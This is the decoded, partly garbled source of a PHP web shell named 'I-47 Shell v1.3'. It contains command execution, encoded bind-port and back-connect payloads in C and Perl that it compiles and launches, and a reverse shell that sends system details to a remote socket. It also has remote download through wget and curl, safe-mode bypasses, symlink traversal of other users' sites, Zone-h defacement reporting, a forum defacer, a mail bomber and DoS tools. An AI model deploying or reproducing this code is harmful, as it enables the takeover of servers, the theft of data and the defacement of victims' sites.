/* Decoded by unphp.net */ ?>b' $k) { $row[$j] = "\'".mysql_escape_string($k)."\'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");"); } } } fclose ($fp); header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } $back_connect_c=""; $backconnect_perl="pVRdb9owFH1H4j/cptVIJgIETaoESjVGoUXToCLQF4pQIBfwFuzIdtahaf99dmzK2IRWqY6Uj3uOzzm+cXJ5Uc8Fry8JrWfI03IpFwiDUasVsdU3lO1y6UrshcQdqBFCpWAuY7GtaKgzvuuGH9X5sQ3lElmDW5QuwqYHP1VFzck4oRKcqYg32IKrBszumZBzmD0wri5P9Ik6bUNNCILT+1GwguZ1raGOAJpBMwBL+gUmoA1nn/okxfuYJinqiigwNxp1P/cmVXjoLwZDfaMLi2gy7nW+VGGDMuNMsuWexjt0K3KVVTwPGC9C2Mwzfw5TGi9TBMlgjIKl3xF0fBtnxSjF1dFLW8dJwheEFo14nAXzKhCKchFLdqg15t5/rLpG90+rA+/93AYhdFPgQ5Vfc04oVkBxarUaHGzhX60oi5+ploq2mKZwTggTHYvjjkmErXK1TLNw/ybOJVunudi6njZgGVI3mtwOhlVwbt4ZlnMCjaaT6hmoNx7/DdlE4RvGydL8s2Pgf7g2zTjHeI1QlyWqZZ/20OFfc/oaobctzUiZD9V1cLVl4PthGBUFQtcsDH2/Dbne7ODHbc1QE16IU4H8SCOJIbzAt4SrTcD43uDZsyXA0Ul3TKNgXpiNYv8dnvK67I36vwE="; $zone="vVRtb9owEP6OxH+4ZhFKWkJg6roqEFS0VStaX1ChmybKB8c5wGpiZ7ZZS6vut8+Gjm5V1r18mPLBuedenrvznV9shQslw4TxsECZVSvVCpt6Wwe983cfxq2Jf1etFJJxDc6lNh+/5E77JyhHUFTq5e6c0CsYH0xgSeZCwDgVegJU5FDidCSuYSTgQmEElhZuBcdGkUFnyDRCxpTuQudCwlucEooSTkmO3e+B8IZpc9xXKy6RnyGGdbbNiQHdmVwUYoO1LEbnIi9grTGiKJB7pO50rLfjG+RAWdYYOqRrzTOh0CNW4SYGVZRkRHorIwtOhfRcEjfbLunEbmKOnR2/Wrl7oLFmY5dYYtPJjQjxVwg/iQVQwkGhLZJfKUjQhEOQWGRLH+5ALRKl5aNbHZp1eO1D7DhtuN80cbwzgYFQ2mTGU/ZIum7QQiH0z6JoKOgV6ijqnx6ObDXKyKagp6qgy/HaGyDKXppKiLvgPJ+oUwdrPRBSW+t9k+JACi1WrpoWjg9CAscbvbn2NbczOBuOIORCs+kyzIlS8BumpwF6lGKhI9gOty/lj3P1oD/HKUqU0b/FDY4Jny3IzI6lDhJZSvFGcI1cB6NlYexIUWSMEs0ED2+Cv2Q1oThS6xvBe8Qi6GXsC5ayml2RQW9miCM4Ebcsy0i422iCZ1asMPRJhm04GfYPYa/RbMNHxlNxreB0BK8aLb805JEZoD9plJshn+l5vD48J10vZbzeqFoqcsJ4K34+0GZEa/ahyEWKcWu/JpEoweO9mpn7nOl4iDxd5er/quvHqyQieEiqtLCBJLOcRMBFQAmdlze0FPwfpW2emBWnLVRl5u69l/b3/hs="; $bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP"; $bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg=="; $phpproxy=" "; ?>
"; return; } $num = mysql_num_rows( $pTable ); echo "
"; echo "$tablename ($num_rows) "; echo " | "; echo ""; echo "Schema "; echo " | "; echo ""; echo "Data "; echo " | "; echo ""; echo "Empty "; echo " | "; echo ""; echo "Drop "; echo " | "; echo "
\' . $v . \'\'; } } $dir = getcwd(); if(isset($_GET[\'dir\'])) { $dir = $_GET[\'dir\']; } function dis() { if(!ini_get(\'disable_functions\')) { echo "None"; } else { echo @ini_get(\'disable_functions\'); } } function mycmdexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join(" ",$result);} elseif (($result = "$cmd") !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } function rrmdir($dir) { if (is_dir($dir)) // ensures that we actually have a directory { $objects = scandir($dir); // gets all files and folders inside foreach ($objects as $object) { if ($object != \'.\' && $object != \'..\') { if (is_dir($dir . \'/\' . $object)) { // if we find a directory, do a recursive call rrmdir($dir . \'/\' . $object); } else { // if we find a file, simply delete it unlink($dir . \'/\' . $object); } } } // the original directory is now empty, so delete it rmdir($dir); } } function godir($dir) { //echo $dir; $zip = new ZipArchive(); $filename= basename($dir) . \'.zip\'; // open archive if ($zip->open($filename, ZIPARCHIVE::CREATE) !== TRUE) { die ("Could not open archive"); } else echo "fdg"; if (is_dir($dir)) // ensures that we actually have a directory { $objects = scandir($dir); // gets all files and folders inside foreach ($objects as $object) { if ($object != \'.\' && $object != \'..\') { if (is_dir($dir . \'\\' . $object)) {//echo $dir . \'/\' . $object; // if we find a directory, do a recursive call godir($dir . \'\\' . $object); } else { // if we find a file, simply add it $zip->addFile($dir . \'\\' . $object) or die ("ERROR: Could not add file: $key"); } } } // the original directory is now empty, so delete it $zip->addFile($dir) or die ("ERROR: Could not add file: $key"); } } function which($pr) { $path = execmd("which $pr"); if(!empty($path)) return trim($path); else return trim($pr); } function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\'); if($w) { @fwrite($w,gzinflate(base64_decode($t))) or @fputs($w,gzinflate(base64_decode($t))) or @file_put_contents($f,gzinflate(base64_decode($t))); @fclose($w); } } function remotedownload($cmd,$url) { $namafile = basename($url); switch($cmd) { case \'wwget\': execmd(which(\'wget\')." ".$url." -O ".$namafile); break; case \'wlynx\': execmd(which(\'lynx\')." -source ".$url." > ".$namafile); break; case \'wfread\' : execmd($wurl,$namafile); break; case \'wfetch\' : execmd(which(\'fetch\')." -o ".$namafile." -p ".$url); break; case \'wlinks\' : execmd(which(\'links\')." -source ".$url." > ".$namafile); break; case \'wget\' : execmd(which(\'GET\')." ".$url." > ".$namafile); break; case \'wcurl\' : execmd(which(\'curl\')." ".$url." -o ".$namafile); break; default: break; } return $namafile; } function magicboom($text) { if (!get_magic_quotes_gpc()) return $text; return stripslashes($text); } function checkproxyhost() { $host = getenv("HTTP_HOST"); $filename = \'/tmp/.setan/xh\'; if (file_exists($filename)) { $_POST[\'proxyhostmsg\']="
\' . $v . \'\'; } } myparam(\'Server software\', @getenv(\'SERVER_SOFTWARE\')); if(function_exists(\'apache_get_modules\')) myparam(\'Loaded Apache modules\', implode(\', \', apache_get_modules())); myparam(\'Open base dir\', @ini_get(\'open_basedir\')); myparam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\')); myparam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\')); $temp=array(); if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL"; if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL"; if(function_exists(\'oci_connect\')) $temp[] = "Oracle"; myparam(\'Supported databases\', implode(\', \', $temp)); echo \'
System Info : | Software Info | |||
Software : | Server Port : | |||
Uid : | ||||
Disk Space : | Free Space : | Server IP : | Your IP : | |
View Directories : | Current Directory : ".htmlspecialchars($b).$directorysperator.\'\'; $i++; } ?> | Disable functions : | Safe Mode : |
Symlink | Forum | Sec. Info | Code Inject | Bypassers | Server Fuzzer | Zone-h | Proxy | DoS | Tools | PHP | Exploit | Connect | SQL | About | SelfKill | LogOut |
Install PHP Based Proxy | |
(must have final /) | |
I-47 Shell v1.3
[--==Coded By Arjun==--]
================================
----- / -------
| / /
| ___ /___| /
| | /
----- | /
================================
| Get Domains | | | Users & Domains | | | Symlink Server | | | Symlink File | | | Script Locator | |
Domains | Users |
".$domains[1][0]." | " . $user[\'name\']. " |
Domains | Users | Symlink |
".$domains[1][0]." | ".$user[\'name\']." | Symlink |
Users | Symlink |
" . $matches . " | "; echo "Symlink |
Users | Symlink |
" . $matches . " | "; echo "Symlink |
| Do It Manually | | | Do It Automatically | |
"; while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://".$sites[$i]; } ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Posted !"; } // Spread Shell else if (isset($_GET["bypass"])) { if(isset($_GET[\'copy\'])) { if(@copy($_GET[\'copy\'],"test1.php")) { $fh=fopen("test1.php",\'r\'); echo ""; @fclose($fh); unlink("test1.php"); } } else if(isset($_GET[\'imap\'])) { $string = $_GET[\'imap\']; echo ""; } else if(isset($_GET[\'sql\'])) { echo ""; } else if(isset($_GET[\'curl\'])) { $ch=curl_init("file://" . $_GET[curl]); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo ""; } else if(isset($_GET[\'include\'])) { if(file_exists($_GET[\'include\'])) { echo ""; } else echo "
"; ++$i; } echo "Sending Sites To Zone-H Has Been Completed Successfully !!
Safe mode bypass | |
Using copy() function |
Using imap() function |
Using sql() function |
Using Curl() function |
Bypass using include() |
Using id() function |
Using tempnam() function |
Using symlink() function |
Field | Type | Null | Key | "; for( $i = 0; $i < $num; $i++ ) { $field = mysql_fetch_array( $pResult ); echo "|||
---|---|---|---|---|---|---|
".$field["Field"]." | "; echo "".$field["Type"]." | "; echo "".$field["Null"]." | "; echo "".$field["Key"]." | "; echo "".$field["Default"]." | "; echo "".$field["Extra"]." | "; $fieldname = $field["Field"]; echo "Drop | "; echo "
" . $key . " | "; next($row); } echo "" . $r . " | "; } echo " "; $count++; } echo "
"; if($action == "viewdata") echo "name."\'>".$field->name." "; else echo $field->name." "; echo " | "; } echo "Action | "; echo "|||
---|---|---|---|---|
"; echo "$data "; echo " | "; } if(!is_numeric($arrdata[$acount])) echo "No Key | "; else { echo "Edit | "; echo "Delete | "; $acount++; } } echo "
| Forum Defacer | | | Forum Password Changer | |
Port Scanner |
|
Open Ports: "; $host = $_POST[\'host\']; $proto = $_POST[\'protocol\']; $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); for($current = 0; $current <= 23; $current++) { $currents = $myports[$current]; $service = getservbyport($currents, $proto); // Try to connect to port $result = fsockopen($host, $currents, $errno, $errstr, 1); // Show results if($result) { echo "$currents, "; } } } echo " |
| Mail Bomber | | | Mass Mailer | |
Fatal : An unexpected error was occured when trying to connect!
"; } else { fputs ($sockfd ," ================================================================= Coded By Arjun ================================================================="); $pwd = exec_all("pwd"); $sysinfo = exec_all("uname -a"); $id = exec_all("id"); $len = 1337; fputs($sockfd ,$sysinfo . " " ); fputs($sockfd ,$pwd . " " ); fputs($sockfd ,$id ." " ); fputs($sockfd ,$dateAndTime." " ); while(!feof($sockfd)) { $cmdPrompt ="(I47)[$]> "; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , " " . exec_all($command) . " "); } fclose($sockfd); } } } else if(isset($_POST[\'passwd\']) && isset($_POST[\'port\']) && isset($_POST[\'lang\'])) { $passwd = $_POST[\'passwd\']; if($_POST[\'lang\'] == \'c\') { if(is_writable(".")) { @$fh=fopen(getcwd()."/bp.c",\'w\'); @fwrite($fh,gzinflate(base64_decode($bind_port_c))); @fclose($fh); execmd("chmod ".getcwd()."/bp.c 0755"); execmd("gcc -o ".getcwd()."/bp ".getcwd()."/bp.c"); execmd("chmod ".getcwd()."/bp 0755"); $out = execmd(getcwd()."/bp"." ".$_POST[\'port\']." ". $passwd ." &"); echo "$out ".execmd("ps aux | grep bp.pl").""; } else { @$fh=fopen("/tmp/bp.c","w"); @fwrite($fh,gzinflate(base64_decode($bind_port_c))); @fclose($fh); execmd("chmod /tmp/bp.c 0755"); execmd("gcc -o /tmp/bp /tmp/bp.c"); $out = execmd("/tmp/bp"." ".$_POST[\'port\']." ". $passwd ." &"); echo "
$out ".execmd("ps aux | grep bp").""; } } if($_POST[\'lang\'] == \'perl\') { if(is_writable(".")) { @$fh=fopen(getcwd()."/bp.pl",\'w\'); @fwrite($fh,gzinflate(base64_decode($bind_port_p))); @fclose($fh); execmd("chmod ".getcwd()."/bp.pl 0755"); $out = execmd("perl ".getcwd()."/bp.pl" . " " . $passwd ." &"); echo "
$out ".execmd("ps aux | grep bp.pl").""; } else { @$fh=fopen("/tmp/bp.pl","w"); @fwrite($fh,gzinflate(base64_decode($bind_port_p))); @fclose($fh); $out = execmd("perl /tmp/bp.pl ". $passwd ." &"); echo "
$out ".execmd("ps aux | grep bp.pl").""; } } } else { ?>
Reverse Shell | Bind Shell |
---|---|
Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!
$data
"; print "I am at ma Work now :D ;D! Dont close this window untill you recieve a messageCurl | Oracle | MySQL | MSSQL | PostgreSQL | Open Base Directory | Safe_Exec_Dir | PHP Version | Server Admin |
NONE";}else {echo "$df";};} ?> |
Listing folder () | ||||||
Name | Size | Permissions | Modification Date | Rename | Download | Action |
---|
< writable >\';
} else {
echo \'< not writable >\';
}
?>
|
Create File : < writable >\'; } else { echo \'< not writable >\'; } ?> |
Execute : | Create Directory : < writable >\'; } else { echo \'< not writable >\'; } ?> |
Get Exploit |